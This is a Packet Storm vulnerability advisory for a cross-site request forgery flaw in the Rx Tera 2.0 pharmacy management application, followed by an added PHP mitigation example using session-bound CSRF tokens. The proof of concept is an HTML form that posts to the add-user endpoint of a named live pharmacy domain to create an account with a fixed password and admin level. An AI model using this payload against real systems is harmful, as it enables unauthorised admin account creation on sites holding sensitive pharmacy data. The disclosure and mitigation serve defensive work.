Rx Tera 2.0 Cross Site Request Forgery

2018-01-09T00:00:00
ID PACKETSTORM:145757
Type packetstorm
Reporter indoushka
Modified 2018-01-09T00:00:00

Description

                                        
`============================================================================================================================  
| # Title : Rx Tera 2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # email : indoushka4ever@gmail.com |  
| # Tested on : windows 10 Français V.(Pro) |  
| # Version : 2.0 |  
| # Vendor : https://codecanyon.net/item/rx-tera-complete-pharmacy-management-application/19227825 |   
| # Dork : n/a |  
============================================================================================================================  
  
poc :  
  
  
<div class="content-wrapper">  
<!-- Content Header (Page header) -->  
<section class="content-header">  
<h1>  
Add Users  
<small>Create new system users</small>  
</h1>  
<ol class="breadcrumb">  
<li><a href="index.php"><i class="fa fa-dashboard"></i> Home</a></li>  
<li><a href="index.php">Admin</a></li>  
<li class="active">Add Users</li>  
</ol>  
</section>  
  
<!-- Main content -->  
<section class="content">  
  
<!-- Default box -->  
  
<div class="box-body">  
<!-- general form elements -->  
<div class="box box-primary">  
<div class="box-header with-border">  
<h3 class="box-title">All Fields are required</h3>  
</div>  
<!-- /.box-header -->  
<!-- form start -->  
  
<form role="form" method="post" name='form1' action="http://www.jonarchpharmacy.com/admin/signupload.php" onsubmit="return validate()">  
<div class="box-body">  
<div class="form-group">  
<label for="exampleInputEmail1">Full Name</label>  
<input type="text" name="name" class="form-control" id="skills" placeholder="Enter Full Name" required>  
</div>  
<div class="form-group">  
<label for="exampleInputEmail1">System username</label>  
<input type="text" name="userid" class="form-control" id="checkleng" placeholder="Username must be 6 or more characters" required>  
</div>  
  
<div class="form-group">  
<label for="exampleInputEmail1">E-mail</label>  
<input type="text" name="mail" class="form-control" id="checkleng" placeholder="Enter your E-mail" required>  
</div>  
  
<div class="form-group">  
<label for="exampleInputEmail1">Password</label>  
<input type="text" name="password" class="form-control" id="exampleInputEmail1" value="pass123" readonly>  
</div>  
  
<div class="form-group">  
<label>Select user level (1 = Admin, 2 = Dispenser, 3 = Cashier)</label>  
<select name="level" class="form-control">  
<option>1</option>  
<option>2</option>  
<option>3</option>  
  
required</select>  
</div>  
<div>  
<button type="submit" name="register" class="btn btn-primary">Register</button>  
  
</div>  
</div>  
  
</form>  
  
  
  
  
<section class="content">  
<div class="row">  
<div class="col-xs-12">  
<div class="box">  
<div class="box-header">  
<h3 class="box-title">All system users</h3>  
</div>  
<!-- /.box-header -->  
<div class="box-body">  
<table id="example2" class="table table-bordered table-hover">  
<thead>  
<tr>  
<th>Full Name</th>  
<th>E-mail</th>  
<th>Username</th>  
<th>User Level</th>  
<th>Edit</th>  
<th>Delete</th>  
</tr>  
</thead>  
  
<tbody>  
  
  
Greetz :----------------------------------------------------------------------------------------  
|  
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |  
|  
================================================================================================  
`
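
Mitigation sketch (an added example, not part of the original advisory and not the vendor's code): the add-user form in the PoC carries no per-session token, so the handler cannot tell a cross-site POST from one sent by its own page. The PHP below shows one way to bind the request to the admin's session, assuming cookie-based PHP sessions; the field names userid and level are taken from the form above, while csrf_token, issue_csrf_token() and verify_csrf_token() are hypothetical names.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code. Field names userid and level come from
// the form in the advisory; csrf_token and both helper functions are hypothetical.

// SameSite=Strict keeps the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

function issue_csrf_token(): string
{
    // One unpredictable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function verify_csrf_token($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; reject arrays and empty values.
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!verify_csrf_token($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    $userid = $_POST['userid'] ?? '';
    $level  = $_POST['level'] ?? '';
    if (!is_string($userid) || strlen($userid) < 6 || !in_array($level, ['1', '2', '3'], true)) {
        http_response_code(400);
        exit('Request rejected: invalid username or user level.');
    }
    // Token and input checks passed: the application's own user-creation
    // code would run here (not shown on the page, so not reproduced).
    exit('Request accepted.');
}

$token = htmlspecialchars(issue_csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="post">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input type="text" name="userid" required>
  <select name="level"><option>1</option><option>2</option><option>3</option></select>
  <button type="submit" name="register">Register</button>
</form>
```

A POST that arrives without the session's token, as one submitted from a page on another origin would, gets a 403 before any input is processed.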